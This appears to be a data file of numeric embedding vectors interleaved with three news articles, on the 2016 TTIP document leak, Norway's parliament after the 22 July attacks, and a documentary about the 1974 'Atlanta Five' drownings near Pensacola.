0.02264474146068096, 0.003671873128041625, -0.09629135578870773, -0.01685795933008194, 0.026847366243600845, -0.06270187348127365, 0.0310934130102396, 0.021054157987236977, -0.06769105046987534, 0.0011415352346375585, 0.10581997781991959 ]
Bernd Lange, the chairman of the European Parliament's important trade committee, has indicated that he now expects the Transatlantic Trade and Investment Partnership (TTIP) negotiations will probably fail, following a major leak of confidential documents from the talks. Greenpeace Netherlands has released half of the entire TTIP draft text as of April 2016, prior to the start of the 13th round of TTIP negotiations between the EU and the US, which reveal US demands in detail for the first time. Although the EU has improved transparency recently, and routinely publishes its offers for each TTIP chapter, the US has consistently refused to do so. Even MEPs and MPs have faced extreme restrictions on what they are allowed to look at, copy, or even say when it comes to the US position. The new leak by an unknown whistleblower represents a major blow to US attempts to keep its negotiating demands confidential, and provides important information to the both the EU and US public for the first time. US wants ISDS and regulatory cooperation The new documents confirm some of the fears expressed by many organisations and commentators regarding two key areas discussed previously here on Ars: the Investment-State Dispute Settlement ( ISDS ) mechanism, and regulatory cooperation As Ars noted last September, in the face of massive public concerns about ISDS, the European Commission is proposing a modified approach, the Investment Court System (ICS), which it claims addresses the problems of ISDS. However, even though the ICS idea was formally presented to the US last year, one of the TTIP leaks shows that it was not even discussed during the 12th round, something that the European Commission's public report on the negotiations omitted to mention. This confirms earlier indications that the US is not interested in ICS, and will insist on including standard ISDS in TTIP, regardless of EU worries. A leaked chapter on "Regulatory coherence, transparency and other good regulatory practices" indicates that the US wants all regulations, even those concerning health and safety or environmental issues, to be judged by the yardstick of their effects on trade: "When developing a regulation, a regulatory authority of a Party shall evaluate any information provided in comments by the other Party or a person of the other Party regarding the potential trade effects of the regulation that it receives during the comment period." In practice, this means that companies will be able to challenge any new EU and US regulations that might have an adverse effect on their profits, as is often the case when new environment regulations are brought in. It is likely to make it much harder to strengthen laws that might disadvantage business but protect public health and safety. A post on the War on Want site points out that the leaks contain a very clear indication of what the US wants to achieve as a quid pro quo for opening up its markets: "Any export gains for EU car manufacturers will come at a massive cost to European agriculture, with the European Commission sacrificing the small-scale farmers of Europe in order to force open US markets for major European corporations." The key sentence comes in the particularly sensitive document entitled "Tactical State of Play of the TTIP Negotiations." This is essentially the European Commision's frank evaluation of where things stand in the TTIP talks. Here's what it has to say on the US demand: "progress on motor vehicle-related parts would only be possible if the EU showed progress in the discussion on agricultural tariffs." In other words, if the EU doesn't open up its markets to agricultural products from the US—which means things like beef treated with hormones, and maybe even chlorine chickens—there will be no improved access for EU car manufacturers. US wants more GMOs in the EU Perhaps the most problematic demand from the US side is that the Commission should allow foods with GMOs to be approved and sold in the EU more easily. In TTIP documents, GMOs are such a sensitive area that they are called by the euphemism "modern agricultural technology." At the moment, the approvals process is rather slow in the EU, but the US hopes to change all that, as another leaked chapter makes clear: "Where a Party requires a product of modern agricultural technology to be approved or authorised prior to its importation, use or sale in its territory, the Party shall allow any person to submit an application for approval at any time." Although that sounds harmless enough, it would represent a major change from the present system. Greenpeace Netherlands naturally singles out some concerns about the environment, and the fact that there is nothing about climate protection in the texts. In its press release it says: "Long standing environmental protection is dropped. The 'General Exceptions' rule, enshrined in the GATT agreement of the World Trade Organisation (WTO), is absent from the text." Listing image by Greens/EFA
[ -0.04102899134159088, 0.02233034558594227, 0.021367767825722694, -0.04495302960276604, 0.045613519847393036, 0.03977101668715477, 0.026443351060152054, 0.011348172090947628, 0.08215521275997162, 0.06035398319363594, -0.06870081275701523, 0.04822102561593056, -0.07797858119010925, 0.0006446974002756178, -0.019166264683008194, -0.03857879713177681, -0.02148262783885002, -0.08067405223846436, -0.038135651499032974, 0.04738317057490349, 0.045417942106723785, 0.0003561129269655794, 0.011874345131218433, 0.0066131590865552425, -0.008019941858947277, 0.00061634904704988, 0.06839650869369507, -0.09763698279857635, 0.02434520795941353, -0.025778019800782204, -0.03800519183278084, -0.004975771531462669, -0.03735605254769325, -0.03627828508615494, 0.022182056680321693, 0.007625944446772337, 0.07516241818666458, -0.04105306789278984, -0.0621132031083107, -0.06334593147039413, 0.025004353374242783, -0.07661774009466171, -0.0585491843521595, 0.00784518662840128, -0.02828596532344818, 0.034326281398534775, 0.053033892065286636, 0.05557719245553017, -0.11392877995967865, -0.02312360517680645, 0.05936537683010101, -0.01820969581604004, 0.029024289920926094, -0.01344195008277893, -0.005443707574158907, -0.006531015504151583, 0.03417441248893738, 0.04679242894053459, 0.01946868933737278, -0.0019679537508636713, -0.0027472847141325474, -0.03226928412914276, 0.0217751357704401, 0.03007059544324875, 0.08477839082479477, 0.03708379715681076, -0.03323913365602493, 0.046468060463666916, -0.046044640243053436, -0.02313370257616043, 0.010179847478866577, -0.10284068435430527, -0.03916599228978157, -0.0039795199409127235, 0.04540218412876129, 0.026712432503700256, 0.04378748685121536, 0.02446865104138851, 0.09436338394880295, -0.04077447950839996, 0.07803118228912354, 0.02241126261651516, 0.009382183663547039, -0.05669311061501503, 0.027024785056710243, -0.029996775090694427, 0.028869379311800003, -0.02071494236588478, 0.03180484101176262, -0.011980214156210423, -0.027578867971897125, -0.08474674820899963, 0.026375779882073402, 0.027803797274827957, 0.004698080010712147, 0.026222458109259605, 0.025906581431627274, 0.06970494240522385, -0.04678588733077049, 0.024513166397809982, 0.07141533493995667, 0.11718928068876266, -0.05912606045603752, -0.04229963570833206, -0.13211281597614288, 0.008830376900732517, -0.005960650276392698, -0.08840557932853699, 0.08042311668395996, 0.04122520983219147, -0.04811645671725273, -0.03186914697289467, -0.009668484330177307, -0.030361317098140717, -0.05752328038215637, -0.03562184050679207, -0.01745215803384781, -0.03215464577078819, 0.11671628057956696, -0.06986300647258759, -0.05003402382135391, 0.01931534893810749, -0.07805601507425308, 0.012549680657684803, 0.054962046444416046, 0.04438218101859093, -0.02433563955128193, 2.1845802112124025e-33, -0.03232332691550255, 0.06511090695858002, -0.05408414825797081, 0.040590304881334305, -0.05235172435641289, 0.051508091390132904, 0.041490789502859116, -0.04870711266994476, -0.1264757364988327, -0.0095896041020751, -0.019649820402264595, 0.04294276237487793, 0.030507318675518036, 0.07281675934791565, 0.00925839226692915, -0.022577892988920212, -0.013054274022579193, 0.09775204211473465, 0.09127568453550339, -0.027011990547180176, 0.10886988043785095, 0.004100476391613483, 0.0802932158112526, 0.01490003615617752, 0.0984170064330101, -0.03274308145046234, -0.08297711610794067, -0.00732047064229846, 0.07937686145305634, 0.03153006359934807, -0.06679485738277435, 0.1078440397977829, 0.02085256017744541, 0.048259347677230835, -0.023053210228681564, 0.0226446446031332, -0.010249574668705463, -0.06278596073389053, -0.025253791362047195, -0.07119113206863403, -0.016995064914226532, 0.005906806327402592, -0.06007535755634308, 0.02115994691848755, 0.06050122156739235, -0.03700666502118111, -0.02636452578008175, -0.03844757005572319, -0.03916684910655022, -0.03498450666666031, -0.002588744042441249, 0.08050931245088577, -0.03757499158382416, -0.0921771451830864, 0.03481089696288109, -0.039059706032276154, -0.01596248149871826, -0.05028640106320381, 0.03880107402801514, 0.01848684251308441, -0.010185550898313522, 0.06634188443422318, -0.012346603907644749, 0.06712043285369873, -0.019570328295230865, 0.11652345210313797, -0.07319466024637222, 0.03233456611633301, -0.03239716216921806, -0.04132136330008507, -0.042118582874536514, -0.006258133798837662, 0.047359317541122437, -0.03862548992037773, -0.004473503679037094, -0.022207101806998253, 0.029102863743901253, 0.09983186423778534, 0.03404384106397629, -0.028788097202777863, -0.09166330099105835, -0.06186659261584282, 0.06528116762638092, 0.020600976422429085, 0.01209922693669796, -0.04610422998666763, 0.01454954594373703, -0.007059222087264061, 0.0534314289689064, 0.09714646637439728, -0.10944521427154541, -0.04051940143108368, -0.036735862493515015, 0.09210819005966187, 0.04826841503381729, -4.237726195007457e-33, -0.08952932804822922, -0.009717851877212524, -0.04553661122918129, 0.007118941750377417, -0.024920180439949036, -0.062505342066288, 0.006808036006987095, 0.02380315214395523, 0.07385680824518204, -0.061387378722429276, -0.03050919435918331, -0.07727199792861938, 0.009021295234560966, 0.04803972691297531, -0.03613857179880142, -0.03286789357662201, 0.04974497854709625, 0.00021253527665976435, 0.05499643459916115, -0.026215778663754463, 0.10340135544538498, -0.050704535096883774, -0.03831615298986435, 0.10740506649017334, 0.017894519492983818, -0.006924227345734835, 0.0425785630941391, -0.12166254222393036, 0.0625329315662384, -0.01875344105064869, -0.023752517998218536, 0.04412898048758507, -0.11721231043338776, 0.08899687975645065, -0.05890532210469246, 0.027786826714873314, 0.0001689022028585896, -0.008573745377361774, 0.0013954931637272239, 0.010802676901221275, -0.01982191950082779, -0.0428382083773613, -0.093709297478199, 0.01461760513484478, -0.04508276283740997, -0.03282342851161957, -0.0008933217031881213, 0.02791968733072281, 0.0024784512352198362, -0.06398449838161469, 0.03725019097328186, 0.07972752302885056, 0.0198886226862669, 0.036613740026950836, -0.046022769063711166, 0.06102149561047554, 0.0035115100909024477, -0.01445835642516613, 0.0321098156273365, 0.05067559704184532, 0.05667092278599739, 0.10436620563268661, -0.044189583510160446, -0.033615656197071075, 0.09182968735694885, -0.031002191826701164, -0.009187884628772736, -0.033523157238960266, 0.07132325321435928, 0.0046966709196567535, 0.053433533757925034, -0.10960789769887924, -0.04271413013339043, -0.05244377627968788, 0.17497548460960388, 0.0021630567498505116, 0.0019100941717624664, -0.07419133186340332, -0.06116338446736336, 0.04384986311197281, 0.025051303207874298, 0.046815406531095505, 0.02787713147699833, 0.02722647227346897, 0.09744385629892349, 0.04159814864397049, 0.03955984115600586, -0.033129215240478516, -0.0038079575169831514, 0.03369278460741043, -0.11210542172193527, -0.01459365151822567, -0.07424943894147873, 0.003692084224894643, 0.010815425775945187, -5.6125976755083684e-8, -0.05040663853287697, -0.050999321043491364, -0.002983460668474436, -0.031036578118801117, 0.009837147779762745, -0.038041163235902786, -0.0071698459796607494, 0.012634686194360256, -0.07162437587976456, 0.01284584030508995, 0.04855218902230263, 0.012072031386196613, -0.06274010986089706, -0.07824235409498215, -0.0033434838987886906, 0.01647062972187996, -0.06715770810842514, 0.0039025775622576475, -0.04441084340214729, -0.0003758918901439756, -0.020196583122015, 0.0358065702021122, -0.04069092124700546, -0.04671916365623474, -0.02266216091811657, 0.03461664170026779, 0.09542576968669891, 0.0289938785135746, 0.00017684363410808146, 0.050883445888757706, -0.035032421350479126, -0.021255474537611008, 0.03966423124074936, 0.046107497066259384, -0.06211048364639282, -0.013022019527852535, 0.026787878945469856, 0.0685511976480484, 0.005184573587030172, -0.007560810074210167, -0.06963279098272324, 0.046233419328927994, 0.0040278262458741665, 0.05704164877533913, -0.04922766610980034, 0.010764853097498417, -0.0902714803814888, 0.0037166427355259657, 0.013956736773252487, -0.054257724434137344, -0.06872276961803436, -0.07606296986341476, 0.03229471296072006, 0.055318232625722885, 0.08127225935459137, 0.026820173487067223, -0.025084635242819786, -0.029006076976656914, -0.012635594233870506, -0.007586001884192228, 0.025556299835443497, -0.09425337612628937, 0.02675076387822628, 0.035036880522966385 ]
Image caption Mr Stoltenberg said Norwegians had found their way home again Norway's Prime Minister, Jens Stoltenberg, has warned his compatriots not to launch a "witch-hunt" following the deadly attacks of 22 July. At a special session of parliament, he urged citizens and fellow politicians to show restraint and tolerance. King Harald and Crown Prince Haakon stood in silence as the speaker read the names of the 77 victims. MPs listened as violinist Arve Tellefsen played sombre music by the Norwegian composer Ole Bull. More funerals were held on Monday, including that of Gizem Dogan, a 17-year-old girl of Turkish origin. Turkey's Foreign Minister Ahmet Davutoglu attended her funeral ceremony, held on the first day of Ramadan, in Trondheim, on Norway's west coast. It took place on a football pitch because the local mosque was too small. Anders Behring Breivik, 32, has admitted carrying out the attacks - a car bomb in Oslo that killed eight people, and a mass shooting on the island of Utoeya that killed 69 mostly young Labour Party activists. Police said he would face interrogation this week that would be "more confrontational" than previous questioning. 'Fear and despair' A survey has suggested public pressure is growing in Norway for stiffer sentences for serious crimes. The poll for Verdens Gang newspaper suggested 65% of people thought penalties in Norway's justice system were "too low"; more than half said their view had hardened since the massacre. But Justice Minister Knut Storberget said: "We must listen and have a debate, while not drawing hasty conclusions. "It's important that policy isn't shaped in a state of panic." The prime minister also warned against measures that would curtail people's freedoms. "I would like to ask from this podium that we avoid starting a witch hunt on expression," he told MPs. "Everyone had to choose their own path in a landscape filled by shock, fear and despair. But the Norwegian people found their way home again." But the right-wing Progress Party indicated that it would press for tougher judicial measures. Per Sandberg, chairman of parliament's justice committee, and a member of the party, said when parliament reconvened in a few weeks there would be discussion "about sentences, searches by the police and everything else". "My party has always wanted that. I believe there will be new measures," he told Reuters.
[ 0.06971536576747894, 0.10109123587608337, -0.029473990201950073, -0.00449458509683609, 0.11328523606061935, 0.012744983658194542, 0.061301685869693756, 0.01758243329823017, 0.01874517649412155, 0.038408830761909485, -0.007113320287317038, 0.05434715375304222, -0.004624302498996258, -0.02964354306459427, 0.03954208642244339, 0.02339235506951809, -0.016195043921470642, 0.014158936217427254, -0.024811720475554466, 0.06109217554330826, -0.009731818921864033, 0.014698956161737442, 0.09480234235525131, 0.024045228958129883, 0.08055414259433746, 0.00882780086249113, 0.06258261203765869, 0.003898624097928405, -0.0490109845995903, 0.03613146394491196, 0.09720694273710251, -0.10647037625312805, -0.07769683003425598, 0.009450972080230713, -0.042332038283348083, 0.024359723553061485, 0.06424064189195633, -0.10036244243383408, -0.030198926106095314, 0.05177620053291321, 0.006955064833164215, 0.06815098226070404, -0.03071209043264389, -0.04873069375753403, 0.03888530284166336, 0.0005137170082889497, -0.10874099284410477, -0.06913723051548004, -0.0016747849294915795, 0.0029107341542840004, -0.02419515699148178, -0.036778245121240616, 0.05269426107406616, -0.09273890405893326, 0.013128187507390976, -0.14013122022151947, -0.04738514870405197, 0.02554711326956749, 0.010775230824947357, -0.03360486030578613, -0.06463271379470825, -0.04135832563042641, 0.01697746478021145, -0.03452284634113312, -0.0791071206331253, -0.05237971618771553, 0.04648495838046074, -0.035060953348875046, 0.045247677713632584, 0.0807168111205101, 0.09204652905464172, -0.006721200421452522, 0.02664545737206936, -0.036761324852705, -0.1273280680179596, -0.042166005820035934, 0.0024521013256162405, -0.01600618287920952, -0.013104042038321495, -0.005728794261813164, 0.060428913682699203, -0.062064994126558304, 0.025751866400241852, -0.026880213990807533, 0.031419284641742706, 0.00555057916790247, -0.019077353179454803, 0.02207975462079048, -0.05361355468630791, 0.03292045742273331, -0.014484207145869732, 0.03949611261487007, 0.08101332932710648, 0.09918837994337082, 0.13846848905086517, -0.053125858306884766, 0.048269376158714294, 0.11491087824106216, -0.005890355445444584, 0.09593628346920013, -0.016487793996930122, 0.07670722156763077, 0.013967728242278099, 0.004914803430438042, 0.01950155571103096, 0.00103568856138736, -0.06076359376311302, 0.04776017367839813, -0.02781829982995987, -0.04558996856212616, -0.042879942804574966, -0.0359342060983181, 0.053385164588689804, -0.03344012796878815, 0.05823648348450661, 0.05283283814787865, -0.0032469909638166428, -0.05626554414629936, -0.07822810858488083, 0.039985060691833496, 0.06541403383016586, 0.015340692363679409, -0.05397642031311989, 0.13340938091278076, 0.10906888544559479, 0.0687863752245903, 0.018737271428108215, 4.0470297872353885e-33, 0.042290348559617996, -0.011047045700252056, -0.05930177867412567, -0.002625314984470606, 0.048074934631586075, 0.007707692217081785, -0.09122278541326523, -0.01759512536227703, 0.08283767104148865, 0.05403020605444908, -0.03622288629412651, -0.07277204096317291, -0.022892270237207413, -0.08918651938438416, -0.08243121206760406, -0.04628518968820572, 0.025585725903511047, 0.08633201569318771, 0.033533308655023575, -0.01373426616191864, 0.02693994715809822, -0.09086476266384125, -0.03753646835684776, 0.013686109334230423, 0.011042376980185509, 0.04909614846110344, 0.05852711573243141, -0.003717714222148061, 0.061194177716970444, 0.006711449474096298, -0.0560745932161808, -0.088292695581913, 0.04856959357857704, -0.03137272223830223, 0.040475986897945404, -0.02071462944149971, -0.08493248373270035, -0.03313731774687767, -0.0698833018541336, -0.03324439749121666, 0.01081302110105753, -0.051559463143348694, -0.06457915902137756, 0.022340919822454453, -0.048531923443078995, 0.0032379073090851307, -0.023422664031386375, 0.023264823481440544, 0.03792016953229904, -0.06913483887910843, 0.007066741120070219, 0.07160117477178574, 0.020050790160894394, 0.03555038571357727, 0.02663024701178074, 0.06461977958679199, -0.005957260262221098, -0.028483731672167778, 0.0947616770863533, -0.007485421374440193, 0.059963107109069824, 0.018564561381936073, 0.008721614256501198, 0.0029889359138906, 0.05810556560754776, -0.07951413094997406, -0.021646246314048767, -0.012697170488536358, 0.01037810742855072, -0.01087363064289093, 0.06466995924711227, 0.0033772988244891167, 0.05055299401283264, -0.033654529601335526, -0.04905693978071213, 0.04853057488799095, -0.012697299011051655, 0.00004506974437390454, -0.032330889254808426, 0.02793607860803604, 0.018522974103689194, -0.00957322958856821, -0.03652661293745041, -0.00340505363419652, -0.028900640085339546, 0.06412763893604279, -0.014883029274642467, -0.06404832005500793, -0.05947154760360718, 0.06412968039512634, -0.04670744389295578, -0.03027229569852352, 0.023266270756721497, -0.09632673114538193, -0.06475755572319031, -4.4257821485939915e-33, -0.06141209229826927, 0.007114266976714134, -0.06363894790410995, 0.026594052091240883, 0.055637426674366, 0.0355294831097126, -0.03862493485212326, 0.021654346957802773, 0.008980019018054008, 0.010111337527632713, 0.08067440986633301, -0.09126754105091095, 0.030944453552365303, 0.031623292714357376, -0.045048560947179794, 0.021824631839990616, -0.022402161732316017, 0.141171395778656, -0.005940680392086506, -0.0377199687063694, -0.026248861104249954, -0.00263805384747684, -0.027479536831378937, 0.06341996043920517, -0.028269710019230843, 0.08083661645650864, 0.10498353838920593, -0.06744365394115448, -0.04979300871491432, -0.07569094747304916, 0.009415650740265846, -0.015121121890842915, -0.005327119026333094, -0.0003221376973669976, 0.003765047062188387, 0.13614597916603088, 0.008676637895405293, 0.05252688378095627, -0.03917647525668144, 0.00017401781224180013, 0.010506857186555862, -0.0011819909559562802, -0.039510536938905716, 0.01278758980333805, -0.0384671576321125, -0.0023505042772740126, 0.007933300919830799, 0.04264865815639496, 0.10262202471494675, -0.06400072574615479, -0.08135181665420532, 0.03648335859179497, -0.0379333533346653, -0.02544868364930153, 0.06444839388132095, -0.028761794790625572, -0.07981196790933609, -0.11739303916692734, 0.02938561886548996, -0.039246898144483566, -0.0028420842718333006, -0.07827568799257278, -0.020370377227663994, 0.01396274846047163, 0.024833116680383682, -0.0436190664768219, -0.09015043079853058, -0.07496026903390884, 0.026788458228111267, 0.04218998923897743, 0.027338681742548943, -0.0382428839802742, -0.07153607159852982, 0.04052111506462097, 0.02077673189342022, 0.02310444787144661, -0.021127620711922646, 0.04464893043041229, -0.010598375461995602, -0.031958840787410736, 0.013973853550851345, -0.09673639386892319, -0.08446764945983887, 0.040673889219760895, 0.037408050149679184, -0.024191319942474365, 0.05100966617465019, -0.033235304057598114, -0.07622397691011429, 0.02859230525791645, 0.0010803028708323836, 0.020662087947130203, 0.10039126873016357, -0.045006297528743744, -0.030586715787649155, -5.638866440449419e-8, -0.011343652382493019, 0.015185506083071232, -0.07294470071792603, -0.04256436228752136, 0.03621814399957657, -0.013578618876636028, -0.0485171303153038, -0.059646494686603546, -0.12029339373111725, 0.038410600274801254, 0.0328839085996151, 0.06521294265985489, -0.033819183707237244, -0.05324273183941841, 0.01975872367620468, -0.04666135832667351, -0.018843092024326324, 0.014232886023819447, 0.012534070760011673, 0.003810303285717964, 0.028958451002836227, 0.04035838693380356, -0.011142808012664318, -0.045273713767528534, 0.07228755950927734, 0.038412149995565414, 0.03715316951274872, 0.10581989586353302, 0.029504433274269104, 0.023122530430555344, -0.03315718099474907, 0.00017838666099123657, -0.11031770706176758, -0.04119259491562843, -0.009737852029502392, -0.02547626383602619, -0.00577726773917675, -0.011419305577874184, -0.01238404493778944, -0.008168930187821388, -0.07817160338163376, 0.005966393277049065, 0.06580379605293274, 0.04821532592177391, -0.04314592853188515, -0.02406846545636654, 0.048441898077726364, -0.06386858224868774, -0.049288298934698105, 0.016083315014839172, -0.0322873555123806, -0.04013831540942192, 0.03196408972144127, 0.060600053519010544, 0.059140417724847794, -0.009136154316365719, 0.010367595590651035, 0.008414137177169323, 0.02857969142496586, 0.0734758973121643, -0.008199533447623253, -0.034381844103336334, -0.03949404135346413, -0.01800268515944481 ]
Buy Photo Civil rights leader Rev. H.K. Matthews. (Photo: John Blackie/[email protected])Buy Photo In 1974, five men from Atlanta came to Pensacola on a fishing trip and drowned in rough waters. That's the official summation of the deaths of the "Atlanta Five," and for some people it leaves much to be desired. For family members, civil rights leaders and academics, questions still abound. Why would five experienced fishermen be in a boat with no gear and without wearing life jackets? If the men were in the water for more than a week before being found, why were their bodies so well preserved? Why do witness statements about the events leading up to the deaths seem inconsistent? Atlanta-based producer Edward Anderson will be in Pensacola next week attempting to tackle some of those questions. Anderson is filming a documentary about the Atlanta Five for the Storyline Group and SLG Media, and he is hoping his work will help provide five families the answers they've been seeking for the last 41 years. "They want to make it clear they are not happy with the results of the investigation," Anderson said of the decedents' families. "They would like to publicize what happened to their loved ones in the event someone will come forward with more information." Anderson said he got involved in the project after meeting Janice Holloway Cameron, the daughter of one of the Atlanta Five. The woman told him the story of how her father disappeared, how officials said he died and what she and many others believe actually happened. Lee Roy Holloway, Robert Walker, Marvin Walker, John Sterling and Lonnie Merritt, all black men, reportedly left Atlanta around 7:30 p.m., Nov. 29, 1974, for a fishing trip to Pensacola. It was an excursion they had reportedly made several times during a 20-year-span. At about 10 a.m. the next day, Robert Walker’s son was informed his father’s boat had been found abandoned in the Santa Rosa Sound. Reportedly, the anchor line had been cut, life preservers were in the boat and the key was still in the ignition. The men’s food, ice, fishing gear and bait were found in a nearby camper. The U.S. Coast Guard and the Sheriff’s Office performed a search of the area, but the men were not located and the search was discontinued. Their families requested assistance from the Southern Christian Leadership Conference, the civil rights group founded by Dr. Martin Luther King Jr., and then-SCLC President Ralph Abernathy announced he would travel to Pensacola to look into the disappearances. Soon after the announcement, “The bodies started washing up mysteriously,” said Rev. H.K. Matthews, an area civil rights leader who headed the local chapter of the SCLC. Matthews and Abernathy were able to view the bodies, and Abernathy described them as “natural looking,” according to the website atlantafive.com. “John Sterling, after having been in the water for 12 days, still had his glasses on his face,” Matthews said. “That was something that troubled us.” The prevailing unofficial theory is that the men were kidnapped in an act of racially-motivated violence, then killed and dumped in the Santa Rosa Sound when it was discovered there would be an outside investigation. There is a witness account that the Atlanta Five had gotten into a verbal altercation with a local bait shop owner, and he had threatened at least one of the men’s lives. There is another witness account from a man named Joe Sullivan who said he saw the men preparing to go out on the choppy water and warned them against it. He reportedly said he saw the men on Saturday evening, an apparent conflict with the timeline. “Our thinking all along was that Mr. Sullivan was being used to cover up what we think was a murder,” Matthews said. “The whole thing was speculative, but there is enough evidence that the speculation is very strong.” Matthews is just one of many who thinks the five men were victims of foul play. The Atlanta Five case is being reviewed by Syracuse University College of Law faculty and students as part of The Cold Case Justice Initiative, a project that “seeks justice for racially motivated murders during the Civil Rights era on behalf of the victims, their families, local communities, and society at large.” The group is delving into hundreds of cases from around the country, and has been assisting Anderson with research for his documentary. The groups are also working to have the case investigated under the Emmett Till Unsolved Civil Rights Crime Act, a federal initiative to resolve lingering race-related cases. Anderson plans to spend three days filming and conducting interviews in Pensacola next week, with the hope that someone out there can finally provide some satisfactory answers. "These folks are troopers," Anderson said of the Atlanta Five’s families. "They've been vigilant. Over the years their enthusiasm has faded some, but they've never given up. There are too many clues that seem to have been missed." Read or Share this story: http://on.pnj.com/1OAqzBM
[ -0.0914364606142044, 0.10379663854837418, -0.004155810456722975, 0.059193115681409836, 0.0850488469004631, -0.015333575196564198, -0.0014678831212222576, -0.06523503363132477, -0.05725235864520073, 0.0493001714348793, 0.03278447315096855, -0.03329652547836304, 0.030509890988469124, 0.03175368532538414, -0.05820666626095772, 0.01739564724266529, -0.010567117482423782, -0.039669498801231384, -0.14475250244140625, 0.047030091285705566, -0.1026923879981041, 0.04320482537150383, -0.01211366057395935, -0.02113276720046997, 0.030749082565307617, 0.02859419956803322, -0.050246383994817734, 0.005045892205089331, 0.0034204896073788404, 0.006009118631482124, -0.007672099396586418, 0.019842397421598434, -0.0028216857463121414, 0.012751416303217411, 0.011177384294569492, 0.02324550598859787, 0.019293490797281265, -0.08001784235239029, -0.017961034551262856, 0.04535500332713127, 0.01820370741188526, 0.008714373223483562, -0.02140643820166588, 0.017610063776373863, -0.06828157603740692, -0.0403049997985363, -0.02035435289144516, -0.009212428703904152, -0.003199936356395483, -0.004560680128633976, -0.04124921187758446, -0.04435078054666519, -0.009694818407297134, -0.07415641099214554, -0.010918863117694855, -0.13179264962673187, -0.09138116985559464, -0.0628819540143013, -0.057523928582668304, -0.06138269230723381, 0.05546976998448372, -0.03907347843050957, -0.02888692170381546, 0.03419618681073189, -0.009713751263916492, 0.06703679263591766, 0.03174876421689987, -0.07989957928657532, 0.07483452558517456, -0.024818681180477142, 0.00593559630215168, -0.005079890135675669, -0.001514651463367045, 0.003357419976964593, -0.045691490173339844, -0.03087679296731949, 0.0658479854464531, -0.027572045102715492, -0.004074336960911751, -0.07069305330514908, 0.011692717671394348, -0.11514102667570114, -0.003233828814700246, 0.042588621377944946, -0.03754100203514099, 0.03450153023004532, -0.011547563597559929, -0.031519774347543716, -0.06845497339963913, 0.04683574289083481, -0.016270918771624565, -0.02550339512526989, 0.08567999303340912, -0.08487816900014877, 0.03296959400177002, 0.09233483672142029, -0.06442482769489288, 0.04718222841620445, 0.003477460937574506, 0.011778505519032478, 0.005297899711877108, -0.03932911530137062, 0.001859547570347786, -0.09231588244438171, 0.041363295167684555, -0.07162083685398102, -0.05070875585079193, 0.014863535761833191, -0.05600297823548317, -0.02341281808912754, -0.02332368865609169, 0.07898443937301636, -0.027093809098005295, 0.07119187712669373, 0.03569864109158516, -0.0008781019132584333, -0.07188340276479721, 0.022785812616348267, -0.005743814166635275, -0.046027328819036484, 0.029451122507452965, 0.0282363910228014, 0.001758907688781619, 0.005960453767329454, 0.06696957349777222, 0.035712603479623795, 0.02517109178006649, 3.11161325983726e-33, 0.04884041100740433, -0.0534660778939724, 0.010616154409945011, 0.048737138509750366, 0.0873430147767067, 0.026387780904769897, -0.09296953678131104, -0.040328431874513626, 0.07089737802743912, 0.027725722640752792, 0.02361750416457653, 0.031040774658322334, 0.03476138785481453, -0.09072510898113251, -0.07187354564666748, 0.014891346916556358, -0.09299720078706741, -0.011510927230119705, -0.10939263552427292, -0.07765103131532669, 0.034197524189949036, -0.00725121283903718, 0.00563770579174161, 0.014988962560892105, -0.05040031671524048, 0.019726354628801346, 0.006085836328566074, 0.037669166922569275, -0.0553709901869297, 0.0067690652795135975, -0.05497036501765251, 0.01407825667411089, 0.09072086215019226, -0.05047810450196266, 0.1284559667110443, 0.03004058077931404, 0.12197060137987137, 0.015022086910903454, -0.04126871004700661, 0.034204546362161636, -0.0208283681422472, 0.019911199808120728, -0.017356175929307938, 0.04604240506887436, -0.008357129991054535, -0.03516543656587601, 0.037930041551589966, 0.05473463609814644, 0.02008800581097603, 0.03455003723502159, 0.04682457074522972, 0.011831558309495449, -0.007252800744026899, -0.03310743346810341, -0.0016219483222812414, 0.1004284918308258, -0.04185507446527481, 0.012118622660636902, 0.00658815074712038, -0.038087014108896255, 0.03461788222193718, 0.09890547394752502, 0.013591544702649117, 0.0548657588660717, 0.032298531383275986, 0.07889141142368317, 0.05305112898349762, -0.013563495129346848, -0.0170629620552063, -0.006008129101246595, 0.047974951565265656, -0.015672534704208374, -0.020669203251600266, -0.09350278228521347, 0.01272525917738676, 0.03299349173903465, -0.005774612072855234, 0.019066892564296722, 0.00880978349596262, 0.07224713265895844, 0.03355499356985092, 0.027841990813612938, 0.10043850541114807, -0.008756917901337147, -0.021692465990781784, -0.0889698788523674, 0.02079196088016033, -0.014788863249123096, 0.019185272976756096, 0.036492761224508286, -0.0364195741713047, 0.06711161136627197, 0.030708394944667816, -0.05882306769490242, 0.014647653326392174, -5.114239802511835e-33, -0.014047292061150074, -0.011762982234358788, -0.051239803433418274, -0.015444315969944, 0.026380157098174095, -0.1196998730301857, 0.021289940923452377, -0.03469955921173096, 0.10574164241552353, -0.044719088822603226, -0.00813221000134945, 0.035840440541505814, -0.030610332265496254, 0.04841403290629387, -0.07397323101758957, -0.02613181248307228, 0.021352680400013924, -0.024694060906767845, -0.0404701754450798, -0.0488881841301918, 0.03221295401453972, -0.011737666092813015, -0.05701819434762001, 0.06761777400970459, 0.04113389551639557, 0.08460502326488495, 0.027871666476130486, -0.02648843266069889, -0.04709206894040108, -0.08425222337245941, 0.025930095463991165, 0.0005152816884219646, 0.057872474193573, 0.03173436224460602, -0.05185515433549881, 0.023264080286026, 0.07917470484972, 0.11607982963323593, -0.06307567656040192, -0.07133492827415466, 0.02448226884007454, 0.006812497973442078, -0.011993044055998325, -0.028563305735588074, -0.0532417967915535, 0.00010521511285332963, 0.004057024605572224, 0.0455254502594471, -0.06351034343242645, 0.0041796742007136345, -0.0695677101612091, 0.0010080627398565412, -0.008616253733634949, 0.0615362823009491, 0.011171864345669746, 0.009828396141529083, -0.017818255349993706, -0.04531913250684738, 0.028486711904406548, 0.0381292849779129, 0.01406779419630766, 0.04462487995624542, -0.04370676726102829, 0.047109927982091904, 0.03375259041786194, 0.03833353891968727, -0.01204750221222639, -0.06703662127256393, -0.10640059411525726, -0.0175669826567173, -0.010021970607340336, -0.13473986089229584, -0.0782625824213028, -0.08256177604198456, 0.013670982792973518, 0.07462891191244125, -0.10221458226442337, 0.10221020877361298, -0.004801764152944088, 0.02679787389934063, 0.01752622239291668, -0.1037605032324791, -0.06537507474422455, 0.08304451406002045, 0.022038720548152924, 0.03782397881150246, -0.00431853299960494, -0.04761229082942009, 0.09054596722126007, 0.0347164161503315, -0.07409844547510147, -0.10543332248926163, -0.05842998996376991, 0.017405256628990173, 0.04403828829526901, -6.249018724702182e-8, 